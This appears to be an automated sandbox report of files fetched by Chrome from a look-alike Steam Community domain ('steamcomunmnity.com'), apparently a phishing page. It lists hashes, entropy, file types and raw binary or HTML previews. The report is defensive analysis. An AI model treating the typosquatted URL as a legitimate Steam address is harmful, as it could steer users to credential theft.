        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................^.........................!.1..A.."Qa2q....#B..R....$346brt...57su....%Cv..8DS......c...'FT..................................<.......................!1.A."Qaq...2........#3BR.4r.$..CDb............?..@...G1.hd.)...gU..2...Y.H...&q`..<L)9<jI.yW.V......5u* ....D....|.U*x.g.R......I0i.@%FU.......^.0%..3.........\.j...u*@j<..'.K+...b...aG./W...'....uU.5..11..:*...A ...H....'....A...jj.3.S*7.L.05...s...u*@b.P....W2..I..Vv...L...j.g.V.,4PV.?MV./TR+....F..0...R......A.Q....G.NN.V<4r.$.h@.q...9...G.....6u4./..V.s...<+K*..3...S....C..s...,.PK.&.d..m4-.&G/...='.{......r5H.H.D.Y<.H....'.,..s.-A.<.5.GeQ.Fr....P0{.S9.i.,..5 ...j...j.$.RI..d.j.T.F..2^5%..S.T.(...0./k....I\..x....a..b:...t..L.o.c.>|h..........?6&X.b......n5$.t...9.\..f.*8.BO}.!.....!:g.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3454)
        Category:downloaded
        Size (bytes):250073
        Entropy (8bit):4.991667323216123
        Encrypted:false
        SSDEEP:3072:a+U62AWiYQs5NhJPN15Rdf/iojVUmunoqDZnWewCJ9gb46vzpx:D+Rdmm5OWewCJ9gb46v9x
        MD5:9D86FB865A0E8F174CA1CC6232AD78D5
        SHA1:AED20FF1BF4A0333CD4CE5DECD428FFA15E895EC
        SHA-256:587E96C8B539BDC4046F059347B2806A8B10B18404D0D101C79546AD1E997AE5
        SHA-512:FAC0635932ACB90FF40D318A2C677BDE966748DE50BDDECAF616AA3D767A896EC5AAA6293923EA1B6B2E23188121490AACA8E7B96A9630D1632DDE2BCB047455
        Malicious:false
        Reputation:low
        URL:https://steamcomunmnity.com/5f1d56uq7tf/
        Preview:<!DOCTYPE html>.<html class=" responsive" lang="ru">. <head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <meta name="theme-color" content="#171a21">. <title>........ ......... .. S.T.A.L.K.E.R. 2: Heart of Chornobyl ..... Steam</title>. <link rel="shortcut icon" href="https://steamcommunity.com/favicon.ico" type="image/x-icon">. <link href="https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&amp;l=russian&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">. <link href="https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=qUG5Ub5rrq2J&amp;l=russian&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">. <link href="https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=Grv-5yNFuEfg&amp;l=russian&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">. <link hr
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):62215
        Entropy (8bit):7.975301195397119
        Encrypted:false
        SSDEEP:768:zN1NjoT6zVBqXbInqqTPFPxbM/n888D2WIB1/4t+M6AKKVjfq3HCHI9YjcU5pj2f:zvXzVBqcq8LAB1/+bCHl9/UAi8qWxM4L
        MD5:C26D42BB591016FCF24A24D2A0D55896
        SHA1:E3F19C53E083DB01587F988526EA35B4F162774E
        SHA-256:D7F0C93CE78AD9082AB5775C5EB9E1849F227AE950EFC03127495E1E16BA18C9
        SHA-512:94021A19B90A6B345271BAB53008E5A46F9DEAE72240A0A0A6FBD0493C596F67786B34F8BD3FCE16C2FA372C1A4B702B2B54888B8D348E10C0E6050E4F17FE04
        Malicious:false
        Reputation:low
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................Q.X............................................e..........................!.1AQ."a..2q.....#BRS........$3CUVWrt..%458Db......&7ETcs....6u.Fe..'.d...................................B........................!.1Q..ARq...."2Sa....4...3B#br...5C$c.T.............?...;")m...s...Jp_...;f.)F..YD6.w.iA.U.......\....Q.A%y..)_D2..u...S.F..`..g.^...rq...a).jt.).m.!].#B..X........j..3..x..0........J.r.>...m...p..6l4.....77...m^....O8.c6.v..i..Q....4....7y...........q.R.Tf-..x.-.....b}..:F..9V.K.......[1.....a...=.q..+.......Q..Ggf.g]e!e!..% .......4.4.A.W..eRMM.~&....Rlg...BO..x..~.=...1^.].#...EJf..+..D........;......KN.#.[9...$...G.^.i.eF;.....Vu0........U.IyS...5..*|CH..Yy5..T...7'Q.;...YJs...I.1Y._.a:)...y..k...t-5'.S.U.....*..Y'.M}.q....u..JF.r...q-.........,J..f..v..uV.\...._R....'.FM..i..2.E%...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (4482), with CRLF line terminators
        Category:downloaded
        Size (bytes):157023
        Entropy (8bit):5.435679406712303
        Encrypted:false
        SSDEEP:1536:D11sAh60MhmjGFh61e5lnl9a/PdVcTzWMGEN3qxVqGoteFANNfsf9M6kQuOEmTdh:W0861e5/9a3dVcj9qVqZrrUEvm
        MD5:B5FA8E27433FC39BDBE68372BF6BE8FC
        SHA1:D028C6DF68851BD0F85E9834A8D792716A42792B
        SHA-256:E55138DEEE8B46C196313010C92F5BDFB5EAF3C029D821DBFCAEF2183B477062
        SHA-512:E1BB395283CB1A50B24D314B1AFD345C37BD6A9F0072859ABFE7405B0560D8AA2B9FC503FC4AE63BBF823E925E5F95E720550DA6E920FF6E88E7679C70D7A9FD
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=tfqOJ0M_w5vb&l=russian&_cdn=cloudflare
        Preview:..Steam = {...sm_bInitialized: false,...sm_bUserInClient: false,...sm_bUserInGameOverlay: false,...sm_bUserInTenfootBrowser: false,...sm_bUserInMobileChat: false,...sm_bUserInMobileApp: false,.....BIsUserInSteamClient: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInClient;...},.....BIsUserInGameOverlay: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInGameOverlay...},.....BIsUserInSteamTenfootBrowser: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInTenfootBrowser;...},.....BIsUserInClientOrOverlay: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInClient || Steam.sm_bUserInGameOverlay;...},.....BIsUserInSteamMobileChat: function()...{....if ( !Steam.sm_bInitialized ).....Steam.Init();......return Steam.sm_bUserInMobileChat;...},.....BIsUserInSteamMobileApp: function()...{....if ( !Steam.sm_bInitialized )...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 118x118, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):51961
        Entropy (8bit):7.977517962203987
        Encrypted:false
        SSDEEP:1536:PfTnziLO5cC4D21Hw4WMY1YDdaSIsp8r+f:Te44+Hfb8SDp8r+f
        MD5:0089641E8BD3076B93F5AD4C555291DF
        SHA1:36CFB6C6609307659C120D80DA8C0BCBD7DC377D
        SHA-256:4A0B2814FBC3C4C6E585E0F7105C2CA24D75B5C39DD954AADAA52EEA56305E93
        SHA-512:AA311D20F834A778FC3D39733BD4C176E140D1530942CF455EE74518718EC9647D958822E42E5F0D252B2C226DDB9AC71318B279AEB6375BBEFE447C8084F194
        Malicious:false
        Reputation:low
        Preview:......JFIF.....v.v.....C....................................................................C.......................................................................................................................u............................!.1A.."Qaq#2......BR.....$3FVbrtv......'48S....%69CTcds...........&5DEUWw....()7Gefu.....................................N........................!.1AQ..aq......."R......#2BS.34Cbrs....$%5.6DTc....&............?./.w.Ww.[.H...=.tI..N[.&.R......a...u.......=..ur=.k.l..[E.kNy....a.68......7*..Rw/..j}.O....hp_......KW.7..l<.[...>.'...48/....q..Z.A...?e/s?[...$._J...~.^.{.|......<...?S...$._J...~.^.{..RUz...Y.T.....S.../...0_...../..^.z.z.yS.0~.-O.I.......z..".GU.7..g..g.b...........g...:.A...a.P.......+..?......g....W...........S.../.|.../[=._(.......*......_.....~.^.{.|......O.Os.-{L...+..?......g....ooz2.3s\.m{P{C../....~.^.{.|...[.._..t..Z.X..`..}..?....l..|...[...Q7\..h.x..}......Q/[=._(*}....j_..t.'.E.j4.PbN...G...?O/[=..?T~.{
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):32023
        Entropy (8bit):7.9662781277757695
        Encrypted:false
        SSDEEP:768:l+k8EjzDncUFLnjqwDGIy8pdKqbheBshtEagMnFOZaWu:ltRDcQruEjy8/kyEnMAal
        MD5:7747FFFD6A7828762A06BDF2780621F4
        SHA1:409E46993FF729B518026D49D5311BF7A8DC7ED7
        SHA-256:160AAF40EDDB413B83B1DA78C846B4D66B5123EEE1D7E43E287BCFA0BF3584D9
        SHA-512:83FCE1BB72E5A745BEA5666617EF2B952D362CA19A2E54F8178AF5553223E312CFAC181D97467B4A9249E83A928C83264089AF22D3F52505E2989F05CE9F9EAE
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................................................................N..........................!.1."AQ.aq.2....#B....R...3b..%..$4CSr...'s..).................................$.....................!1.A.Q"aq2BR.............?.......<......1.p..~..[.~...y.-..V.oC.8........!.....o....a.....V._........n..`.{X.{.........G.k....y.X....{...0R..k....$.`.7..k{.......bF.q{......!..}.....`.)....{...%Sae...}pC..._.o_l..,.....\.,v.y<.S.`./"...q.\...p..B..R... .....*....i.T..z.....'.b..!{q..?.....m.......%.H~I.7.o....tvk.....` v .pOs..c&.tS..SG....F..L..5..@..h..F}.I......-3...&...*Y..z...UI..f..:y...#.?.{[..&....n0.mA....{{c.v).._.:...I.....w.E./.d...gBd 6...2..._...v..[cX...q.s(...TSx.u=.=...:D.>..`...rF..,.........]+......#,.....k.H...kK8....&)...X.V3....4.9OTu..b\.S.G.r...a.o5.v...Q.$.....'.jL.e....y.......I.Su?58.f....^#E..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansMedium4.015;Plau;MotivaS
        Category:downloaded
        Size (bytes):124048
        Entropy (8bit):6.074024700633004
        Encrypted:false
        SSDEEP:1536:v4Kkq/szjKJRIDCnR96guXgECINo28BZZDhpkemOXaxq4jKea8GyFLaE0Af0ffL9:vf/fxn7ElXxE0wS0fj9
        MD5:2D64CAA5ECBF5E42CBB766CA4D85E90E
        SHA1:147420ABCEB4A7FD7E486DDDCFE68CDA7EBB3A18
        SHA-256:045B433F94502CFA873A39E72D616C73EC1B4C567B7EE0F847F442651683791F
        SHA-512:C96556EC57DAC504919E806C7DF536C4F86892B8525739289B2F2DBBF475DE883A4824069DBDD4BB1770DD484F321563A00892E6C79D48818A4B95406BF1AF96
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015
        Preview:........... DSIG...........GDEF...4...,...@GPOS......l..u.GSUB.d....w.....OS/2u..........`cmap.d..........cvt G..t........fpgm.6!........gasp............glyf5.}2........head...W.......6hhea...v.......$hmtx._X.........loca.:yV........maxp.......l... names...........post.......<....prep..........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:dropped
        Size (bytes):5469
        Entropy (8bit):6.064363147987587
        Encrypted:false
        SSDEEP:96:AvfYSFKIMSxjU72WVBsmGLY0b/Ozwwz5uKIMSxjU72WVBpeIXIoss:kYS0IOahh9b/Ozwwz7IOaEeq
        MD5:4F0CE612F218FF67BEC38F2FF9123DFA
        SHA1:6211B1146EFE003E6271E15FD4FF5B61FE809045
        SHA-256:862887D7615B9E80A05E057A455D0BC37193220E2C608E3258E9986883C8077F
        SHA-512:B755780F7C837394802276B875ABD607CE60CA6B97631DC1DB370BD1DF5A85ED043D0A130FE8870C7AE28CBFB004D5C52C1D045FCC7DC511B46565172F478FB6
        Malicious:false
        Reputation:low
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" style="enable-background:new 0 0 16 16;" xml:space="preserve">..<style type="text/css">....st0{display:none;}....st1{display:inline;fill:#67C1F5;}....st2{fill:#67C1F5;}..</style>..<g id="Layer_2" class="st0">.......<image style="display:inline;overflow:visible;" width="16" height="16" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ..bWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdp..bj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6..eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTQ1IDc5LjE2..MzQ5OSwgMjAxOC8wOC8xMy0xNjo0MDoyMiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJo..dHRwOi8vd3d3LnczLm
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:dropped
        Size (bytes):5844
        Entropy (8bit):7.923006877213236
        Encrypted:false
        SSDEEP:96:AqwNxggm9gU/ofr/kBqlmbpaXuU36rLi3cd1U7KSOwtT32paHiWNOxjJMJZ:ONxggm95ofIBqA8VKi3NWSOwt7jiWNOO
        MD5:C9C35CF2A91D5E4773E6991D013B6D1F
        SHA1:DEDF37957D17E06752592C9882BD5E2440F1E8A1
        SHA-256:ACB5E36460933573815822284F0F06ADDE749F7DD29A62D9D2EED40886C3A44C
        SHA-512:3B41DD5B7349CDBE6B5235DAE110F357B0F159115C2B30415C8336B649C6772131A754FB18D7F6537C3F21743C84BD1E9BFF3934DE4A233974609098261E374E
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................7.........................!1A.."Qaq..2...#B.....3R..C.................................2......................!1..AQ."aq.2..#..R.3B.................?....L.#.q.;.&.C.8`..H........]......+.f..2x.?.25Z.+Oa~..s:....q....t7.#8d..Q...N..fC..".@.^.`a.e......}?.......+x.eX...q..I..D].o"P.d......oe....0S.`x.-.k......c$....1....J...E.....I<...H...n...n."Um.........aMB%...u.q.n...:1\.n.9.A....."..(%.qv.E...Lg.4.7.......x.e}.3..Dx....e.e...2.... .\...Ki!Kv.....0{.....0.....]1.FT..g8..R....2.-HKt2I.B.9...O.M{...j......8=~.VU..x...=...L..-.h..S/.........&]ZH.@..q.I>.S....6..19...D+.).d.v....LP.....%.}.....<.iO...5.J..Q..`...........H.Nw)#..H..F.+...2. .y.;.L.[.4..~....J....T.x:.)..b*.q.G..&I..eIs.N.8 ..B..T@....g.5...s.. ..$}@.....Em..D+...8.sHn.1..+.}.${X.. ....?...s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3160
        Entropy (8bit):7.8296175189826
        Encrypted:false
        SSDEEP:96:vxl4lZWxD75NzL4K49+ZChTC+e40mGP9n:pa4Tfje+YhTC1401Fn
        MD5:0FDA4E1E47FB88B274A86C04A63C4BB8
        SHA1:93F8ED1F529660C290FB833FEE760A389C1C309E
        SHA-256:48DEC840C57EB383D1734E798300B0B379680DDF92D2BCF04EA0009F7C4150A9
        SHA-512:EB94681B6AFC72CCA3AE08BA2DA4D5F27F534C5FD9C0C46DA642D4DC2D44AB7EA22CC58101363D5B86BEC56EE23170A6384164B13E3091F458BA52FD1A1EC7DF
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................;.........................!.1AQa."2q..4....35r....#s.$Bb................................).......................!1A.."2Qaq.3.#B.............?.._.!.7l.V..n.d..&..m.....+.H`.QI..s.Kc..J..Jlb...QX.#..z.R........W...y..#.zX]......c0.L..8..@\...,.Lgd.-.I.....v.,.>..f.lpC....k/c.v}....3\.'W...#...3.J.l....S.K[..q..@.g..b.W..S...km..#.F,.6.....I...c..[..}.]..M2...Y....8##..~5,2..ItS<2..g..O....x..!....(..Q...8?.!..(6.=.;...;..*.=-..B%%...l\.S.*.$..N..H:.6d....=......S.....#>.).L....d|1...>.....R..w..@..e.N......i6?a.....=PK.py..|....8....JW...q..<.Q]...cm+HP........k........,...ku,..Mq0V.0\..#.n1....#...9/..&o._...........x...Wd....+d._n.+@..|X..?...#'...B..C.gl.H%~..B.6.my...b.n.u..........I.x.26.9.S.>8.;...>[..G..&<..]...-....b..d...F7vop.Up.6.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):557
        Entropy (8bit):7.26363709527695
        Encrypted:false
        SSDEEP:12:6v/7O3V4jeTtXfQz+xZmrZXU0SJ433XS0OUnUVi6MMlZZL/PBT:LyyhIz+CrZE0U43HVFUlZXZLnR
        MD5:79364EFAF8D8571D7DD76BAC8226FE61
        SHA1:113924AE62716D89E127B7EE712E16E7BD945B03
        SHA-256:6D916C5D94DD9668A1D04BF51D9013604B754A295677AFE7037BDBC6E8636F60
        SHA-512:C13C5012BBD13D7CBE7EA27FAB908F852C64EE1B960F2053ADBF461729913C8BC5682783894D162F5F52713040F16D350966E29F097335F2CCAD6D5F0A97D536
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/social/facebook_large.png
        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..=K.P..s.....M)"..... .........A..A....8...M..Z..D...p...6$...^.4I...Q.(...m*.........,....*...!.rR,eP_..H.....4..G.$.b^..uH.$H....f*v.].o.....t..1.k...H.....,..]....!|lY..'..T.9..\A{p..1....|....O...2.....>..........4............u.9...OH%....`..}..C.N..C.7.t...p.$.. ..$........./......@.-.{....H.n.:p..;J"zPj[.-...4...<...?.......\\t.X5........e}.+...\..[..i.....I.Tl........................%.......!.........T...8.g. |s.I.....<.o...g}..........IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 19 x 12, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):161
        Entropy (8bit):5.889732387119839
        Encrypted:false
        SSDEEP:3:yionv//thPlmztjllRl/HRthwkBDsTBZtmmAQGzlkWX0N/khY1RtjhCq/4cL+/XN:6v/lhPoJnDsp1AQIlBE91RtjhCE4cK/9
        MD5:F2DAE37ACAC6B9D5A91CAF1885C2F7D0
        SHA1:5F80FDDE9F702A1D7589BC5FAF88C14066E26C32
        SHA-256:93B1FBE4F6245B62BFD4C8C3347ABE0FE67ED711315E59BFADAEBC9873D8D9B5
        SHA-512:8D7FF7133AB97D81985C50FA8FD93916B42B1CE812AF21BC732DCAE45D59B9154FCC965857235D925C471DB191DFB79C0753C70C7A4D5B0285B908E396216805
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/popups/btn_arrow_down_padded.png
        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...CIDATx.b...?.....6....@.........6.h..1..A....@....fH.^.g.HO.......#.7.d.].....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 306 x 260, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):168094
        Entropy (8bit):7.993323863853478
        Encrypted:true
        SSDEEP:3072:6Ts4YyO4yG0ppxkeLDCmLMR40v6vN//cD+qBc/4F6Rso6E/oiE1ey7Mp5HVN3qA9:osvyO4ybkeymwG0v6vNHcDY/ES5c8C2R
        MD5:6A08C3D149EEFEB19A0706B910683D86
        SHA1:722641AAB53281E1679CE4CAB96C1C368404CB24
        SHA-256:7D2F242A418563919C09A23CE121CF1CAC1C79C7F1920778CDA3DD0010C8E304
        SHA-512:4650A9B4627D33E7D0E8654F1F0A344126E710E5F4EC30799E9FEC42C0B31E4F7911F77980067BBF520E56FE214596D170CCC29593BDB873EE78A84082E33046
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...2...........u....pHYs................PIDATx...g.m.y..>_...Su3....s.s.DYb..%RT.%[.m.,...5?..f..q.W....nI.-+p,[.(1....9.$..$.......N....}....9.....V.9...~...O....?I'.......B....9y.Zk<}...q..b.E]a.k..D...o.C.8Z.x.,.].......Far....k,..yn.....lv;().%|..1BK.m.......!.sXkq..3.Z....-.8.\@...Z..p...(...vm....Z*.vD].8.lPd9..1BI..5|..R.(...EU...\Y..k[.V8.ZA+..=..0Z#.<30Z.z.....H.B...A...j(%.C@..!..A?..J#.s..a....!D$..9h.!.Dn..,.f..`-.....P.H....z8.%..V.!@+.n.!.@]..1AH..#F.e..0@I...0X..<..%.......=2c......g.c`.. ..{.]....E.#...=6....Q.......y..Z.&..,.uPJ....!..T.....R8.Z!..u..s..vX6...Bn4.THH...B.E..*..w-B.0Jc.u(..MY!...5.<C..._,a.F.w.)!7...C..Zi......8.ZAJ..W. .24e.,.`....!F.}.........g9.u...!BH.-%z;......JJ@..u@JHH..=..%..h.~~^..0Z.y.<3.M...ux..z4U.a.!..)Q.9. ...Fk..@.....J...AJ....@..........C;......S.s.Y.!..?.]..(.!%...!.}.....B.....2..C...a.BU.p.c.......{.!Q...,.....w..;.-.P.9.\.....B...F..y....3.."."......H|....rt...V..JI...d8...m..,......,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):16055
        Entropy (8bit):2.020046011794595
        Encrypted:false
        SSDEEP:96:VSuTskEWRpxNXrNGQmfGGOdsc5TvEKXgj/:VSXktL5Zq/
        MD5:EEBC181FB6CC5A98FB239B0C39305F2C
        SHA1:856BBA36A81C569FBE7FA5DFD058145C202B66B1
        SHA-256:2EE2F0D807BD71B9E5F9EEE9BC98C1BE1D94195D766C183C7B057B9CCF202A77
        SHA-512:A660E0FA472E3EF6D914D9CA1221FDD968FA666379E7496011110DC9598CBEEBCC6720B61F0F6A7BA4786F73A84B8439530845C43CFAF9242F62FCE4CB46CD11
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_htcvive.png
        Preview:.PNG........IHDR.....................pHYs...............<.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-02-16T16:27:44-08:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-30T16:41:18-07:00</xmp:ModifyDate>. <xmp:M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):4024
        Entropy (8bit):7.871554651450583
        Encrypted:false
        SSDEEP:96:vmuXBHvM4lXRBSfU0IoXH3o2SIf0XSn1rUSgM3Xs2u:Ou1M2RhwXmIf/4SMt
        MD5:759FA45B2024F007710DC3FB302D3FA7
        SHA1:3DB3E21C1FFAB35E7A525CA9810B1B77CCB12CFB
        SHA-256:C50F1BE1495C08E0B72B260D002114BD7E4062E772878EC672A4E2F29092FF85
        SHA-512:8E26C159B1546BA0590384C6F2ECB12D0AFDD8C255EA3159C08F1E51AD075B62BE4F090D28C54DAD3129535CFC4152697C2EC71414236CB6A64D61915B91F0D4
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................E.........................!1...AQa."2q.r....345Rst...7Bb.#$6C.......................................6......................!..1AQ.."2q..34a......#r.$................?..):S)...C!.l.\.|z`#P..:+t....?}.R..d]. Tn.../.0......5[. .\..cjH.jg......,Ruk.)...M.4.y.......}.._. .S(b....I...%.E.7Q'...{..k..}.&Q..........v.q..9Rj|.Jb....pd..d.`r.A..'u..Ql.!...<).y*fzHrW......B...aQt....F..J SjL.(P.....b...'tS*.:Dq..0..Q.B_5E.c.....\...^...JUUG....... .m..F%.!c.$X.g!....$..9..?,Wv&tLm0....(....P.a.(..&S...M..t.OU..!.X.2..[{Z...LJ..y...r1.C.$}...C.1.B..m.....*A]Csn..8...DE...E]..cu...].x,..H.Uou...8^bS`.h.b.t..0;.v......&..L....t.....P..s...E.c..m.. .tz.-...l(.Q.Q%.f..I.....J` %5......."I..r.2Vk...B.z.#(S+....4.t..=]=]d...D..V..a..o..p...F.*.m..}J=x....x..Fe.D,+i$.x.jV
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 25 x 25, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1816
        Entropy (8bit):7.335413459481553
        Encrypted:false
        SSDEEP:48:mwqQNn2xkJ3n7OO8oPTFC+6vUycoKGCAHcDsr9CQ:6Y2w72o7Fh68yLdHcYr9CQ
        MD5:C8A9A5322C7A32D42405AEC4ECC91E8C
        SHA1:A6A04E08067EBBC6E9D70361FAD164CAB634BD9D
        SHA-256:02E650004D02B883D1F77E3C9AB18F556D470CC4F41500917D0CDA68EC62D197
        SHA-512:F057B313CE4AEED427AC04B1278A8FFE105843CD0998CAC5E01DDBCD53CAFFCB5584239646A73C40281D671D22C2E163E0FC3F1A589FFF9E9479CAC206EB241B
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............c....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D62C327C9D6211E6BC85ED92E7B3F4DB" xmpMM:DocumentID="xmp.did:D62C327D9D6211E6BC85ED92E7B3F4DB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D62C327A9D6211E6BC85ED92E7B3F4DB" stRef:documentID="xmp.did:D62C327B9D6211E6BC85ED92E7B3F4DB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`......IDATx.U.k.W.?....fg?21..hT.......H-..VQ.-.......`...(>H...R,B.7...t.iM.i01...nv....;....1...M....a...=...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:dropped
        Size (bytes):7310961
        Entropy (8bit):7.886455356590644
        Encrypted:false
        SSDEEP:98304:xMtw0PvvrFsekpuqnmuUecSgY6MY0V64XaG1TwFFpZJjKc:30/raekpHnmMcC6OXauWXjR
        MD5:1174F706E050E6ACF2EC51F4CF74E276
        SHA1:80F55E559F6256779AA57C8858AE58066288907E
        SHA-256:BE6C6021C0C31B0CE1877DF03F2E68A0C471DA1A273EB8358E72B051CD05C8B1
        SHA-512:F9D9F6EAEFD30E7A97CD9035DB556A4C991C273CCD3BFC7881F8DC03D25AE5F7ECB4D9FA34D19802FE1019E3DD6A77C586418E43E9223BD4B9E6F143B0CE6433
        Malicious:false
        Reputation:low
